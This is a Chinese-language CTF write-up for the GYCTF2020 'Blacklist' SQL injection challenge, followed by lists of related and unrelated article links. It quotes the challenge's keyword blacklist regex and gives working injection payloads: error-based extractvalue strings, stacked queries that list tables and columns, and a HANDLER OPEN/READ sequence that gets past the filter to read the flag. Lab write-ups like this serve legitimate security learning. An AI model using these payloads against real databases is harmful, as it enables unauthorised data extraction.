输入1或者2会返回一个数组
随后输入1’ union select 1,database()–+返回了过滤掉的语句

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

尝试报错注入：
输入

or extractvalue(1,concat(user(),0x7e,version()))

随后输入

1' and extractvalue(1,concat('~',database()))--+

随后使用堆叠注入
堆叠注入与union联合注入的区别在于堆叠注入可以执行任意语句，而且它只会显示第一条语句的结果，其余语句出错什么的没有任何影响
输入

3';use supersqli;show tables;

结果

随后查询字段
输入

3‘;use supersqli;show columns from `FlagHere';--+

结果：

接下来查询flag字段的内容

-1';use supersqli;Select `flag` from `FlagHere`;#

想了各种方法都无法绕过
后来去查看了大佬的blog

1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#

HANDLER … OPEN语句打开一个表，使其可以使用后续HANDLER … READ语句访问，该表对象未被其他会话共享，并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
成功看到了flag
大佬np，是在下浅薄了
附上大佬博客链接：
https://www.cnblogs.com/gaonuoqi/p/12398554.html

[GYCTF2020]Blacklist相关推荐

1. [GYCTF2020]Blacklist 使用handler函数进行sql堆注入

   [GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参 ...

2. BUUCTF [GYCTF2020] Blacklist

   BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容: 输入2/2判断注入类型: 回显为2,可以判断出为字符型注入 输入select,查看是否存在回显: re ...

3. [GYCTF2020]Blacklist 1

   [GYCTF2020]Blacklist 1 在做本题的时候,我们发现过滤掉了很多的关键字 很多注入方法已经没有办法使用(联合查询 布尔盲注 updataxml的报错注入) 并且发现本关的注入方法为 ...

4. BUUCTF[GYCTF2020]Blacklist

   sql注入题型,测试发现黑名单如下: 大小写,双写,编码均不可绕过. 可用的还有,or and union show 输入:1 or 1=1 无反应 输入:1' or '1' ='1 如下: 字符型注 ...

5. Web_SQL注入(1)

   前言: 考察SQL注入的赛题很多,而且涉及到的知识也很杂,就总结一下做过的不同类型的SQL注入汇总一下. [GYCTF2020]Blacklist --涉及新知识HANDLER ... OPEN等.堆 ...

6. BUUCTF持续更新中

   目录 [HCTF 2018]WarmUp [强网杯 2019]随便注 [SUCTF 2019]EasySQL [GYCTF2020]Blacklist [GKCTF2020]cve版签到 GXYCTF ...

7. Web渗透 不断更新

   Web渗透 SQL注入 一般注入步骤 堆叠注入 堆叠注入原理 堆叠注入条件 堆叠注入实例 handler 盲注 GET&POST 检测绕过 变量替换.变换绕过 报错注入 SSTI模板注入 文件 ...

8. ctf_BUUCTF_web（1）

   文章目录 BUUCTF_web SQL注入 1. [极客大挑战 2019]EasySQL 2. [SUCTF 2019]EasySQL 3.[强网杯 2019]随便注 4.[极客大挑战 2019]Ba ...

9. Stacked Queries（堆叠注入）

   文章目录 基本知识 原理介绍: 堆叠注入的局限性 Mysql数据库实例介绍 CTF 实战与各种姿势 修改表名 利用HANDLER语句 利用MySql预处理 正常利用 MySql预处理配合十六进制绕过关 ...

最新文章

1. python文件句柄_Python文件操作
2. C#线程学习的一点体会和总结
3. 迁移聊天记录到Teams
4. if test 多条件_秒懂Python编程中的if __name__ == #x27;main#x27; 作用和原理
5. c语言tcp读写二进制文件,通过TCP/IP连接发送二进制文件
6. UVA583 UVALive5406 Prime Factors【素数因子＋筛选法】
7. python中测试字符串类型的函数_Python新手学习基础之数据类型——字符串类型
8. 黑马程序员视频-微信小程序-原生框架——项目搭建
9. 数据库设计-电话号码长度
10. 无需积分PowerDesigner 下载
11. python 埋点 库_vue 友盟统计埋点插件
12. Ubuntu系统设置时区时间
13. 病理IHC专题|免疫检查点抑制剂疗效生物标志物PD-L1
14. Pandas数据可视化怎么做？用实战案例告诉你！
15. 更新vim8.0后，MacVim中YouCompleteMe出错
16. 【计算机硬件组成】基础知识（必备）
17. 紫光云：打造数字化转型的基座
18. android persist属性使用
19. linux的浏览器大全,Linux下9款浏览器对比
20. 华大HC32L196移植Sx1268

热门文章

1. 《好玩游戏物品清单》实现
2. 欧几里得距离转换（EDT）算法
3. uniapp获取手机网络状态和手机系统信息（如4g，wifi）
4. 基于proteus的花样流水灯的设计（仅供参考）
5. 计算机网络英语app,学习英语软件哪家强？下个app随时随地学英语
6. matcher 类 group(int i) shart(int i) end(int i)用法
7. 嵌入式开发教程哪家好?云计算培训如何学?
8. 移动硬盘中装linux,移动硬盘中安装Linux(CentOS)
9. Python数据结构与算法(3)--基本数据结构
10. 2017蓝桥杯java本科模拟赛